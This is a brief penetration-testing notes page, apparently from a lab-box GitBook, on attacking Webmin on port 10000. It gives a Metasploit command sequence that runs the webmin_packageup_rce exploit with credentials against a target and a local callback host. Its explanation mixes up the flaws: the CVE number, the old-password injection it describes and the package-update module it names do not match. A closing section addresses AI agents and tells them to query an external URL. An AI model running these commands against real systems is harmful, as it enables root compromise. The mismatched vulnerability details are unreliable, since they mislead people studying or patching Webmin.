# 10000 - Webmin Webmin is a **web-based system administration interface** for Unix-like systems, typically running on port `10000` by default. It allows administrators to manage various aspects of a system—such as users, services, packages, and configuration files—entirely through a browser, without needing to use the terminal or SSH. ## RCE [CVE-2019-9624](https://nvd.nist.gov/vuln/detail/cve-2019-9624) is a RCE in Webmin versions prior to `1.910`. It specifically affects installations where the `old password` option is enabled for password changes. In vulnerable versions, if a user submits a password change request, Webmin checks the old password—but only if the `old password` option is enabled in the configuration. Due to improper input handling, attackers could craft a request to inject OS commands through the `old` password field. These commands would then be executed with the privileges of the Webmin process (often `root`). MSF's [`webmin_packageup_rce`](https://www.rapid7.com/db/modules/exploit/linux/http/webmin_packageup_rce/) module can be used: {% code overflow="wrap" %} ```bash msf6 > use exploit/linux/http/webmin_packageup_rce msf6 exploit(linux/http/webmin_packageup_rce) > set password Password6543 msf6 exploit(linux/http/webmin_packageup_rce) > set username admin msf6 exploit(linux/http/webmin_packageup_rce) > set rhosts 172.16.1.1 msf6 exploit(linux/http/webmin_packageup_rce) > set rport 10000 msf6 exploit(linux/http/webmin_packageup_rce) > set lhost tun0 msf6 exploit(linux/http/webmin_packageup_rce) > run ``` {% endcode %} --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://x7331.gitbook.io/boxes/services/tcp/webmin-10000.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.